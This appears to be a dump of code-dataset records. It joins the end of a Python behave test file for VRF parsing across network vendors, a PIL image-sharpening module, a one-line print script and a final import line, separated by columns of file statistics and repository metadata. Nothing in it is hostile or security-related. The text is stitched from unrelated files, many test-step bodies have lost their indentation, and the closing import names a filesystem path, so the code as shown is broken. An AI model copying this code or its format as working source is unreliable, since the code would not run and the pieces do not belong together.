        ("default", "DEFAULT_INSTANCE", NOT_SET),
    ):
        context.o0601.vrf_lst.append(
            VRF(
                vrf_name=name,
                vrf_id=NOT_SET,
                vrf_type=vrf_type,
                l3_vni=NOT_SET,
                rd=rd,
                rt_imp=NOT_SET,
                rt_exp=NOT_SET,
                imp_targ=NOT_SET,
                exp_targ=NOT_SET,
            )
        )
@given(u'I create a VRF object from a NAPALM output named o0602')
def step_impl(context):
    # Convert the stored NAPALM getter output (JSON) into a VRF object.
    napalm_output = open_file(
        path=f"{FEATURES_SRC_PATH}outputs/vrf/napalm/napalm_get_vrf.json"
    )
    context.o0602 = _napalm_vrf_converter(
        hostname="leaf02",
        cmd_output=napalm_output,
    )
@given(u'I create a VRF object equals to NXOS manually named o0701')
def step_impl(context):
    # Expected NXOS result: four VRFs described as
    # (name, vrf_id, l3_vni, rd, rt_imp, rt_exp); targets stay NOT_SET.
    nxos_vrfs = (
        ("CUSTOMER_001", "4", "1000", NOT_SET, NOT_SET, NOT_SET),
        ("INTERNAL_PEERING", "3", NOT_SET, "65432:222", "65432:22", "65432:22"),
        ("management", "2", NOT_SET, NOT_SET, NOT_SET, NOT_SET),
        ("default", "1", NOT_SET, NOT_SET, NOT_SET, NOT_SET),
    )
    context.o0701 = ListVRF(vrf_lst=[])
    for name, vrf_id, l3_vni, rd, rt_imp, rt_exp in nxos_vrfs:
        context.o0701.vrf_lst.append(
            VRF(
                vrf_name=name,
                vrf_id=vrf_id,
                vrf_type=NOT_SET,
                l3_vni=l3_vni,
                rd=rd,
                rt_imp=rt_imp,
                rt_exp=rt_exp,
                imp_targ=NOT_SET,
                exp_targ=NOT_SET,
            )
        )
@given(u'I create a VRF object from a NXOS API output named o0702')
def step_impl(context):
    # Convert the stored NXOS REST/API (XML) output into a VRF object.
    api_output = open_file(
        path=(
            f"{FEATURES_SRC_PATH}outputs/vrf/nxos/api/"
            "cisco_nxos_api_get_vrf.xml"
        )
    )
    context.o0702 = _nxos_vrf_rc_converter(
        hostname="leaf02",
        cmd_output=api_output,
    )
@given(u'I create a VRF object from a NXOS Netconf output named o0703')
def step_impl(context):
    # Convert the stored NXOS Netconf (XML) output into a VRF object.
    nc_output = open_file(
        path=(
            f"{FEATURES_SRC_PATH}outputs/vrf/nxos/netconf/"
            "cisco_nxos_nc_get_vrf.xml"
        )
    )
    context.o0703 = _nxos_vrf_nc_converter(
        hostname="leaf02",
        cmd_output=nc_output,
    )
@given(u'I create a VRF object from a NXOS SSH output named o0704')
def step_impl(context):
    # Convert the stored NXOS SSH (JSON) output into a VRF object.
    ssh_output = open_json_file(
        path=(
            f"{FEATURES_SRC_PATH}outputs/vrf/nxos/ssh/"
            "cisco_nxos_show_vrf_all_detail.json"
        )
    )
    context.o0704 = _nxos_vrf_ssh_converter(
        hostname="leaf02",
        cmd_output=ssh_output,
    )
@given(u'VRF o0001 should be equal to o0002')
def step_impl(context):
assert context.o0001 == context.o0002
@given(u'VRF o0001 should be equal to o0003')
def step_impl(context):
assert context.o0001 == context.o0003
@given(u'VRF o0001 should be equal to o0004')
def step_impl(context):
assert context.o0001 == context.o0004
@given(u'VRF o0002 should be equal to o0003')
def step_impl(context):
assert context.o0002 == context.o0003
@given(u'VRF o0002 should be equal to o0004')
def step_impl(context):
assert context.o0002 == context.o0004
@given(u'VRF o0003 should be equal to o0004')
def step_impl(context):
assert context.o0003 == context.o0004
@given(u'VRF YAML file should be equal to o0002')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf03",
groups=['eos'],
vrf_host_data=context.o0002,
test=True
)
@given(u'VRF YAML file should be equal to o0003')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf03",
groups=['eos'],
vrf_host_data=context.o0003,
test=True
)
@given(u'VRF YAML file should be equal to o0004')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf03",
groups=['eos'],
vrf_host_data=context.o0004,
test=True
)
@given(u'VRF o0011 should be equal to o0012')
def step_impl(context):
assert context.o0011 == context.o0012
@given(u'VRF o0011 should be equal to o0013')
def step_impl(context):
assert context.o0011 == context.o0013
@given(u'VRF o0011 should be equal to o0014')
def step_impl(context):
assert context.o0011 == context.o0014
@given(u'VRF o0012 should be equal to o0013')
def step_impl(context):
assert context.o0012 == context.o0013
@given(u'VRF o0012 should be equal to o0014')
def step_impl(context):
assert context.o0012 == context.o0014
@given(u'VRF o0013 should be equal to o0014')
def step_impl(context):
assert context.o0013 == context.o0014
@given(u'VRF o0021 should be equal to o0022')
def step_impl(context):
assert context.o0021 == context.o0022
@given(u'VRF o0021 should be equal to o0023')
def step_impl(context):
assert context.o0021 == context.o0023
@given(u'VRF o0021 should be equal to o0024')
def step_impl(context):
assert context.o0021 == context.o0024
@given(u'VRF o0022 should be equal to o0023')
def step_impl(context):
assert context.o0022 == context.o0023
@given(u'VRF o0022 should be equal to o0024')
def step_impl(context):
assert context.o0022 == context.o0024
@given(u'VRF o0023 should be equal to o0024')
def step_impl(context):
assert context.o0023 == context.o0024
@given(u'VRF o0101 should be equal to o0102')
def step_impl(context):
assert context.o0101 == context.o0102
@given(u'VRF o0101 should be equal to o0103')
def step_impl(context):
print("Cumulus VRF with Netconf not possible -> Not tested")
@given(u'VRF o0101 should be equal to o0104')
def step_impl(context):
assert context.o0101 == context.o0104
@given(u'VRF o0102 should be equal to o0103')
def step_impl(context):
print("Cumulus VRF with Netconf not possible -> Not tested")
@given(u'VRF o0102 should be equal to o0104')
def step_impl(context):
assert context.o0102 == context.o0104
@given(u'VRF o0103 should be equal to o0104')
def step_impl(context):
print("Cumulus VRF with Netconf not possible -> Not tested")
@given(u'VRF YAML file should be equal to o0102')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf01",
groups=['linux'],
vrf_host_data=context.o0102,
test=True
)
@given(u'VRF YAML file should be equal to o0103')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF YAML file should be equal to o0104')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf01",
groups=['linux'],
vrf_host_data=context.o0104,
test=True
)
@given(u'VRF o0201 should be equal to o0202')
def step_impl(context):
print("Extreme VSP VRF with API has no endpoint -> Not tested")
@given(u'VRF o0201 should be equal to o0203')
def step_impl(context):
print("Extreme VSP VRF with Netconf not possible -> Not tested")
@given(u'VRF o0201 should be equal to o0204')
def step_impl(context):
assert context.o0201 == context.o0204
@given(u'VRF o0202 should be equal to o0203')
def step_impl(context):
print("Extreme VSP VRF with API has no endpoint -> Not tested")
print("Extreme VSP VRF with Netconf not possible -> Not tested")
@given(u'VRF o0202 should be equal to o0204')
def step_impl(context):
print("Extreme VSP VRF with API has no endpoint -> Not tested")
@given(u'VRF o0203 should be equal to o0204')
def step_impl(context):
print("Extreme VSP VRF with Netconf not possible -> Not tested")
@given(u'VRF YAML file should be equal to o0202')
def step_impl(context):
print("Extreme VSP VRF with API has no endpoint -> Not tested")
@given(u'VRF YAML file should be equal to o0203')
def step_impl(context):
print("Extreme VSP VRF with Netconf not possible -> Not tested")
@given(u'VRF YAML file should be equal to o0204')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="spine02",
groups=['extreme_vsp'],
vrf_host_data=context.o0204,
test=True
)
@given(u'VRF o0301 should be equal to o0302')
def step_impl(context):
assert context.o0301 == context.o0302
@given(u'VRF o0301 should be equal to o0303')
def step_impl(context):
assert context.o0301 == context.o0303
@given(u'VRF o0301 should be equal to o0304')
def step_impl(context):
assert context.o0301 == context.o0304
@given(u'VRF o0302 should be equal to o0303')
def step_impl(context):
assert context.o0302 == context.o0303
@given(u'VRF o0302 should be equal to o0304')
def step_impl(context):
assert context.o0302 == context.o0304
@given(u'VRF o0303 should be equal to o0304')
def step_impl(context):
assert context.o0303 == context.o0304
@given(u'VRF o0311 should be equal to o0312')
def step_impl(context):
assert context.o0311 == context.o0312
@given(u'VRF o0311 should be equal to o0313')
def step_impl(context):
assert context.o0311 == context.o0313
@given(u'VRF o0311 should be equal to o0314')
def step_impl(context):
assert context.o0311 == context.o0314
@given(u'VRF o0312 should be equal to o0313')
def step_impl(context):
assert context.o0312 == context.o0313
@given(u'VRF o0312 should be equal to o0314')
def step_impl(context):
assert context.o0312 == context.o0314
@given(u'VRF o0313 should be equal to o0314')
def step_impl(context):
assert context.o0313 == context.o0314
@given(u'VRF o0321 should be equal to o0322')
def step_impl(context):
assert context.o0321 == context.o0322
@given(u'VRF o0321 should be equal to o0323')
def step_impl(context):
assert context.o0321 == context.o0323
@given(u'VRF o0321 should be equal to o0324')
def step_impl(context):
assert context.o0321 == context.o0324
@given(u'VRF o0322 should be equal to o0323')
def step_impl(context):
assert context.o0322 == context.o0323
@given(u'VRF o0322 should be equal to o0324')
def step_impl(context):
    # Netconf-built object must match the SSH-built one.
    assert context.o0322 == context.o0324
@given(u'VRF o0323 should be equal to o0324')
def step_impl(context):
assert context.o0323 == context.o0324
@given(u'VRF o0331 should be equal to o0332')
def step_impl(context):
assert context.o0331 == context.o0332
@given(u'VRF o0331 should be equal to o0333')
def step_impl(context):
assert context.o0331 == context.o0333
@given(u'VRF o0331 should be equal to o0334')
def step_impl(context):
assert context.o0331 == context.o0334
@given(u'VRF o0332 should be equal to o0333')
def step_impl(context):
assert context.o0332 == context.o0333
@given(u'VRF o0332 should be equal to o0334')
def step_impl(context):
assert context.o0332 == context.o0334
@given(u'VRF o0333 should be equal to o0334')
def step_impl(context):
assert context.o0333 == context.o0334
@given(u'VRF YAML file should be equal to o0302')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf05",
groups=['ios'],
vrf_host_data=context.o0302,
test=True
)
@given(u'VRF YAML file should be equal to o0303')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf05",
groups=['ios'],
vrf_host_data=context.o0303,
test=True
)
@given(u'VRF YAML file should be equal to o0304')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf05",
groups=['ios'],
vrf_host_data=context.o0304,
test=True
)
@given(u'VRF o0401 should be equal to o0402')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF o0401 should be equal to o0403')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF o0401 should be equal to o0404')
def step_impl(context):
assert context.o0401 == context.o0404
@given(u'VRF o0402 should be equal to o0403')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF o0402 should be equal to o0404')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF o0403 should be equal to o0404')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF o0405 should be equal to o0406')
def step_impl(context):
assert context.o0405 == context.o0406
@given(u'VRF YAML file should be equal to o0402')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF YAML file should be equal to o0403')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF YAML file should be equal to o0404')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="spine03",
groups=['iosxr'],
vrf_host_data=context.o0404,
test=True
)
@given(u'VRF o0411 should be equal to o0412')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF o0411 should be equal to o0413')
def step_impl(context):
assert context.o0411 == context.o0413
@given(u'VRF o0411 should be equal to o0414')
def step_impl(context):
assert context.o0411 == context.o0414
@given(u'VRF o0412 should be equal to o0413')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF o0412 should be equal to o0414')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF o0413 should be equal to o0414')
def step_impl(context):
assert context.o0413 == context.o0414
@given(u'VRF o0421 should be equal to o0422')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF o0421 should be equal to o0423')
def step_impl(context):
assert context.o0421 == context.o0423
@given(u'VRF o0421 should be equal to o0424')
def step_impl(context):
assert context.o0421 == context.o0424
@given(u'VRF o0422 should be equal to o0423')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF o0422 should be equal to o0424')
def step_impl(context):
context.scenario.tags.append("own_skipped")
@given(u'VRF o0423 should be equal to o0424')
def step_impl(context):
assert context.o0423 == context.o0424
@given(u'VRF o0501 should be equal to o0502')
def step_impl(context):
assert context.o0501 == context.o0502
@given(u'VRF o0501 should be equal to o0503')
def step_impl(context):
assert context.o0501 == context.o0503
@given(u'VRF o0501 should be equal to o0504')
def step_impl(context):
assert context.o0501 == context.o0504
@given(u'VRF o0502 should be equal to o0503')
def step_impl(context):
assert context.o0502 == context.o0503
@given(u'VRF o0502 should be equal to o0504')
def step_impl(context):
assert context.o0502 == context.o0504
@given(u'VRF o0503 should be equal to o0504')
def step_impl(context):
assert context.o0503 == context.o0504
@given(u'VRF YAML file should be equal to o0502')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf04",
groups=['junos'],
vrf_host_data=context.o0502,
test=True
)
@given(u'VRF YAML file should be equal to o0503')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf04",
groups=['junos'],
vrf_host_data=context.o0503,
test=True
)
@given(u'VRF YAML file should be equal to o0504')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf04",
groups=['junos'],
vrf_host_data=context.o0504,
test=True
)
@given(u'VRF o0601 should be equal to o0602')
def step_impl(context):
assert context.o0601 == context.o0602
@given(u'VRF o0701 should be equal to o0702')
def step_impl(context):
assert context.o0701 == context.o0702
@given(u'VRF o0701 should be equal to o0703')
def step_impl(context):
assert context.o0701 == context.o0703
@given(u'VRF o0701 should be equal to o0704')
def step_impl(context):
assert context.o0701 == context.o0704
@given(u'VRF o0702 should be equal to o0703')
def step_impl(context):
assert context.o0702 == context.o0703
@given(u'VRF o0702 should be equal to o0704')
def step_impl(context):
assert context.o0702 == context.o0704
@given(u'VRF o0703 should be equal to o0704')
def step_impl(context):
assert context.o0703 == context.o0704
@given(u'VRF YAML file should be equal to o0702')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf02",
groups=['nxos'],
vrf_host_data=context.o0702,
test=True
)
@given(u'VRF YAML file should be equal to o0703')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf02",
groups=['nxos'],
vrf_host_data=context.o0703,
test=True
)
@given(u'VRF YAML file should be equal to o0704')
def step_impl(context):
assert _compare_vrf(
host_keys=VRF_DATA_KEY,
hostname="leaf02",
groups=['nxos'],
vrf_host_data=context.o0704,
test=True
)
@given(u'I create a VRF object to test compare function named o9999')
def step_impl(context):
context.o9999 = ListVRF(
vrf_lst=list()
)
context.o9999.vrf_lst.append(
VRF(
vrf_name="default",
vrf_id="1",
vrf_type="vrf",
l3_vni=NOT_SET,
rd="65123:1",
rt_imp="65123:1",
rt_exp="65123:1",
imp_targ=NOT_SET,
exp_targ=NOT_SET
)
)
context.o9999.vrf_lst.append(
VRF(
vrf_name="management",
vrf_id="2",
vrf_type="vrf",
l3_vni="100002",
rd="65123:100",
rt_imp="65123:100",
rt_exp="65123:100",
imp_targ="65123:100",
exp_targ="65123:100"
)
)
@given(u'I create a VRF object to test compare function with <rt_imp> named o9982')
def step_impl(context):
options = {
'compare': {
'rt_imp': True
}
}
context.o9982 = create_vrf_obj_for_compare(options)
@given(u'I create a VRF object to test compare equal to o9982 without <rt_imp> named o9983')
def step_impl(context):
options = {}
context.o9983 = create_vrf_obj_for_compare(options)
@given(u'I compare VRF o9982 and o9999 with a personal function - should not work')
def step_impl(context):
assert context.o9982 != context.o9999
@given(u'I compare VRF o9983 and o9999 with a personal function - should work')
def step_impl(context):
assert context.o9983 == context.o9999
@given(u'I create a VRF object to test compare function with <rt_exp> named o9984')
def step_impl(context):
options = {
'compare': {
'rt_exp': True
}
}
context.o9984 = create_vrf_obj_for_compare(options)
@given(u'I create a VRF object to test compare equal to o9984 without <rt_exp> named o9985')
def step_impl(context):
options = {}
context.o9985 = create_vrf_obj_for_compare(options)
@given(u'I compare VRF o9984 and o9999 with a personal function - should not work')
def step_impl(context):
assert context.o9984 != context.o9999
@given(u'I compare VRF o9985 and o9999 with a personal function - should work')
def step_impl(context):
assert context.o9985 == context.o9999
@given(u'I create a VRF object to test compare function with <imp_targ> named o9986')
def step_impl(context):
options = {
'compare': {
'imp_targ': True
}
}
context.o9986 = create_vrf_obj_for_compare(options)
@given(u'I create a VRF object to test compare equal to o9986 without <imp_targ> named o9987')
def step_impl(context):
options = {}
context.o9987 = create_vrf_obj_for_compare(options)
@given(u'I compare VRF o9986 and o9999 with a personal function - should not work')
def step_impl(context):
assert context.o9986 != context.o9999
@given(u'I compare VRF o9987 and o9999 with a personal function - should work')
def step_impl(context):
assert context.o9987 == context.o9999
@given(u'I create a VRF object to test compare function with <exp_targ> named o9988')
def step_impl(context):
options = {
'compare': {
'exp_targ': True
}
}
context.o9988 = create_vrf_obj_for_compare(options)
@given(u'I create a VRF object to test compare equal to o9988 without <exp_targ> named o9989')
def step_impl(context):
options = {}
context.o9989 = create_vrf_obj_for_compare(options)
@given(u'I compare VRF o9988 and o9999 with a personal function - should not work')
def step_impl(context):
assert context.o9988 != context.o9999
@given(u'I compare VRF o9989 and o9999 with a personal function - should work')
def step_impl(context):
assert context.o9989 == context.o9999
@given(u'I create a VRF object to test compare function with <vrf_id> named o9990')
def step_impl(context):
options = {
'compare': {
'vrf_id': True
}
}
context.o9990 = create_vrf_obj_for_compare(options)
@given(u'I create a VRF object to test compare equal to o9990 without <vrf_id> named o9991')
def step_impl(context):
options = {}
context.o9991 = create_vrf_obj_for_compare(options)
@given(u'I compare VRF o9990 and o9999 with a personal function - should not work')
def step_impl(context):
assert context.o9990 != context.o9999
@given(u'I compare VRF o9991 and o9999 with a personal function - should work')
def step_impl(context):
assert context.o9991 == context.o9999
@given(u'I create a VRF object to test compare function with <vrf_type> named o9992')
def step_impl(context):
options = {
'compare': {
'vrf_type': True
}
}
context.o9992 = create_vrf_obj_for_compare(options)
@given(u'I create a VRF object to test compare equal to o9992 without <vrf_type> named o9993')
def step_impl(context):
options = {}
context.o9993 = create_vrf_obj_for_compare(options)
@given(u'I compare VRF o9992 and o9999 with a personal function - should not work')
def step_impl(context):
assert context.o9992 != context.o9999
@given(u'I compare VRF o9993 and o9999 with a personal function - should work')
def step_impl(context):
assert context.o9993 == context.o9999
@given(u'I create a VRF object to test compare function with <l3_vni> named o9994')
def step_impl(context):
options = {
'compare': {
'l3_vni': True
}
}
context.o9994 = create_vrf_obj_for_compare(options)
@given(u'I create a VRF object to test compare equal to o9994 without <l3_vni> named o9995')
def step_impl(context):
options = {}
context.o9995 = create_vrf_obj_for_compare(options)
@given(u'I compare VRF o9994 and o9999 with a personal function - should not work')
def step_impl(context):
assert context.o9994 != context.o9999
@given(u'I compare VRF o9995 and o9999 with a personal function - should work')
def step_impl(context):
assert context.o9995 == context.o9999
@given(u'I create a VRF object to test compare function with <rd> named o9996')
def step_impl(context):
options = {
'compare': {
'rd': True
}
}
context.o9996 = create_vrf_obj_for_compare(options)
@given(u'I create a VRF object to test compare equal to o9996 without <rd> named o9997')
def step_impl(context):
options = {}
context.o9997 = create_vrf_obj_for_compare(options)
@given(u'I compare VRF o9996 and o9999 with a personal function - should not work')
def step_impl(context):
assert context.o9996 != context.o9999
@given(u'I compare VRF o9997 and o9999 with a personal function - should work')
def step_impl(context):
assert context.o9997 == context.o9999
def create_vrf_obj_for_compare(options):
    """Return a two-entry ListVRF used by the compare-option scenarios.

    The first VRF matches o9999's "default" entry exactly; the second is
    built with deliberately wrong values in every comparable field, so a
    comparison that enables any key in *options* fails while one without
    extra keys succeeds.
    """
    good_vrf = VRF(
        vrf_name="default",
        vrf_id="1",
        vrf_type="vrf",
        l3_vni=NOT_SET,
        rd="65123:1",
        rt_imp="65123:1",
        rt_exp="65123:1",
        imp_targ=NOT_SET,
        exp_targ=NOT_SET,
        options=options,
    )
    # Deliberately wrong values (the "error object" of the scenarios).
    bad_vrf = VRF(
        vrf_name="management",
        vrf_id="2734268734626487328764",
        vrf_type="vrf-but-not-the-good-one",
        l3_vni="100999999999999999002",
        rd="65123:100999999999999999002",
        rt_imp="65123:100999999999999999002",
        rt_exp="65123:100999999999999999002",
        imp_targ="65123:100999999999999999002",
        exp_targ="65123:100999999999999999002",
        options=options,
    )
    return ListVRF(vrf_lst=[good_vrf, bad_vrf])
@given(u'I Finish my VRF tests and list tests not implemented')
def step_impl(context):
    # Closing step: dump every test the suite recorded as not implemented.
    print("| The following tests are not implemented :")
    for missing_test in context.test_not_implemented:
        print(f"| {missing_test}")
| 25.467801
| 95
| 0.615294
| 7,659
| 55,367
| 4.217
| 0.03695
| 0.048486
| 0.068797
| 0.112577
| 0.869528
| 0.796675
| 0.773515
| 0.746424
| 0.672611
| 0.658214
| 0
| 0.077907
| 0.288276
| 55,367
| 2,173
| 96
| 25.479521
| 0.741714
| 0.001066
| 0
| 0.543491
| 0
| 0
| 0.28285
| 0.061315
| 0
| 0
| 0
| 0
| 0.057793
| 1
| 0.118506
| false
| 0
| 0.015178
| 0
| 0.134267
| 0.00934
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
261aff944f30336e3d967b77bf79eaea1e3a0c4c
| 4,393
|
py
|
Python
|
src/sharpen/sharpen.py
|
forgetfulyoshi/sharpener
|
2f7294f9aa57b609594bbcfe32535f5e45665bb6
|
[
"Unlicense"
] | null | null | null |
src/sharpen/sharpen.py
|
forgetfulyoshi/sharpener
|
2f7294f9aa57b609594bbcfe32535f5e45665bb6
|
[
"Unlicense"
] | null | null | null |
src/sharpen/sharpen.py
|
forgetfulyoshi/sharpener
|
2f7294f9aa57b609594bbcfe32535f5e45665bb6
|
[
"Unlicense"
] | null | null | null |
#! /usr/bin/env python
from PIL import Image
def quad_sharpen(image, window_x, window_y, threshold):
    """Sharpen based on a quadratic summation.

    For each scanned pixel, sums the squared difference between every
    pixel in a window_x-by-window_y window and the pixel two steps
    before it on both axes, then thresholds that sum into a binary
    (0/255) output pixel.

    Args:
        image : The input image. Type must be PIL.Image.
            NOTE(review): pixel arithmetic assumes a single-band integer
            mode such as 'L' (the sharpen() wrapper converts to 'L') —
            confirm for direct callers.
        window_x : The horizontal boundary over which to measure intensity.
        window_y : The vertical boundary over which to measure intensity.
        threshold : For every pixel in the produced image, if the original
            image's pixel intensity was above this value then it is set to 255
            in the new image. If the original intensity was below this value,
            then the new image's pixel is set to zero.
    Returns:
        A new image containing the sharpness mapping of the original. The type
        is also PIL.Image
    """
    # NOTE(review): PIL's Image.size is (width, height); the names below
    # treat index 0 as "rows". Access stays self-consistent because both
    # reads and writes use [row, col] in the same order.
    rows = image.size[0]
    cols = image.size[1]
    current_image_access = image.load()
    # Output starts all-zero; border pixels outside the scanned ranges
    # below keep that value.
    new_image = Image.new(image.mode, image.size)
    new_image_access = new_image.load()
    # The +2 start offsets keep the "- 2" neighbour lookups in bounds;
    # NOTE(review): the row range ends at rows - window_x while the col
    # range ends at cols - window_y - 2 — the asymmetry looks intentional
    # but is worth confirming.
    for row in range(window_x + 2, rows - window_x):
        for col in range(window_y + 2, cols - window_y - 2):
            intensity = 0
            for u in range(0, window_x):
                for v in range(0, window_y):
                    # Squared difference against the pixel two steps
                    # up-left of the current window position.
                    step_1 = current_image_access[row + u, col + v]
                    step_2 = current_image_access[row + u - 2, col + v - 2]
                    intensity += pow(step_1 - step_2, 2)
            # Binarise the accumulated intensity.
            if intensity < threshold:
                new_image_access[row, col] = 0
            else:
                new_image_access[row, col] = 255
    return new_image
def abs_sharpen(image, window_x, window_y, threshold):
    """Sharpen based on an absolute value summation.

    For each scanned pixel, sums the absolute difference between every
    pixel in a window_x-by-window_y window and its immediate horizontal
    predecessor, then thresholds that sum into a binary (0/255) output
    pixel.

    Args:
        image : The input image. Type must be PIL.Image.
            NOTE(review): pixel arithmetic assumes a single-band integer
            mode such as 'L' (the sharpen() wrapper converts to 'L') —
            confirm for direct callers.
        window_x : The horizontal boundary over which to measure intensity.
        window_y : The vertical boundary over which to measure intensity.
        threshold : For every pixel in the produced image, if the original
            image's pixel intensity was above this value then it is set to 255
            in the new image. If the original intensity was below this value,
            then the new image's pixel is set to zero.
    Returns:
        A new image containing the sharpness mapping of the original. The type
        is also PIL.Image
    """
    # NOTE(review): PIL's Image.size is (width, height); the names below
    # treat index 0 as "rows". Access stays self-consistent because both
    # reads and writes use [row, col] in the same order.
    rows = image.size[0]
    cols = image.size[1]
    current_image_access = image.load()
    # Output starts all-zero; border pixels outside the scanned ranges
    # below keep that value.
    new_image = Image.new(image.mode, image.size)
    new_image_access = new_image.load()
    # Starting at window_x keeps the "- 1" neighbour lookup in bounds.
    for row in range(window_x, rows - window_x):
        for col in range(window_y, cols - window_y):
            intensity = 0
            for u in range(0, window_x):
                for v in range(0, window_y):
                    # Absolute difference against the pixel one step to
                    # the left of the current window position.
                    step_1 = current_image_access[row + u, col + v]
                    step_2 = current_image_access[row + u - 1, col + v]
                    intensity += abs(step_1 - step_2)
            # Binarise the accumulated intensity.
            if intensity < threshold:
                new_image_access[row, col] = 0
            else:
                new_image_access[row, col] = 255
    return new_image
def sharpen(image, window_x, window_y, threshold, calc_style):
    """Generate an intensity image from a given image.

    Args:
        image (Image.Image): The original image, opened with Image.open()
        window_x (int): The horizontal boundary over which to measure intensity.
        window_y (int): The vertical boundary over which to measure intensity.
        threshold (int): For every pixel in the produced image, if the original
            image's pixel intensity was above this value then it is set to 255
            in the new image. If the original intensity was below this value,
            then the new image's pixel is set to zero.
        calc_style (str): Method used to calculate intensity. Either 'quad' or 'abs'.

    Returns:
        Image.Image: The sharpened image

    Raises:
        RuntimeError: If calc_style is neither 'quad' nor 'abs'.
    """
    print("[+] Format:", image.format)
    print("[+] Size:", image.size)
    print("[+] Mode:", image.mode)
    # The intensity kernels expect a single-band greyscale image.
    grey = image if image.mode == 'L' else image.convert('L')
    if calc_style == 'quad':
        return quad_sharpen(grey, window_x, window_y, threshold)
    if calc_style == 'abs':
        return abs_sharpen(grey, window_x, window_y, threshold)
    raise RuntimeError('Invalid intensity method: {}'.format(calc_style))
| 36.608333
| 85
| 0.620988
| 619
| 4,393
| 4.281099
| 0.169628
| 0.066415
| 0.042264
| 0.043019
| 0.783396
| 0.783396
| 0.783396
| 0.770189
| 0.738491
| 0.69434
| 0
| 0.013676
| 0.300933
| 4,393
| 119
| 86
| 36.915966
| 0.849235
| 0.445937
| 0
| 0.557692
| 0
| 0
| 0.029113
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057692
| false
| 0
| 0.019231
| 0
| 0.134615
| 0.057692
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
2623b10e21dcf4d2ff89b99e213e98056ebd27fd
| 13
|
py
|
Python
|
newpython.py
|
elinabao/firstproject
|
60b0f5a29c90329d7cd59a40f991f680962f6c61
|
[
"Apache-2.0"
] | null | null | null |
newpython.py
|
elinabao/firstproject
|
60b0f5a29c90329d7cd59a40f991f680962f6c61
|
[
"Apache-2.0"
] | null | null | null |
newpython.py
|
elinabao/firstproject
|
60b0f5a29c90329d7cd59a40f991f680962f6c61
|
[
"Apache-2.0"
] | null | null | null |
print ("ABC")
| 13
| 13
| 0.615385
| 2
| 13
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 13
| 1
| 13
| 13
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0.214286
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 5
|
263cd05f4826727cc0d56293263aec45c1c3e70c
| 85
|
py
|
Python
|
SV_Detection/SourceCode/DownstreamAnalysis/test.py
|
NCI-CGR/PacbioPipeline
|
cd6e6b511c5138e8999cf5f0152bc063b41966bd
|
[
"MIT"
] | null | null | null |
SV_Detection/SourceCode/DownstreamAnalysis/test.py
|
NCI-CGR/PacbioPipeline
|
cd6e6b511c5138e8999cf5f0152bc063b41966bd
|
[
"MIT"
] | 8
|
2021-06-10T21:59:42.000Z
|
2022-03-30T19:49:44.000Z
|
SV_Detection/SourceCode/DownstreamAnalysis/test.py
|
NCI-CGR/PacbioSequencingAnalysis
|
cd6e6b511c5138e8999cf5f0152bc063b41966bd
|
[
"MIT"
] | null | null | null |
from /scratch/lix33/lxwg/SourceCode/PacbioSV/SourceCode/Scripts/RunPacbioSV import *
| 42.5
| 84
| 0.847059
| 10
| 85
| 7.2
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.024691
| 0.047059
| 85
| 1
| 85
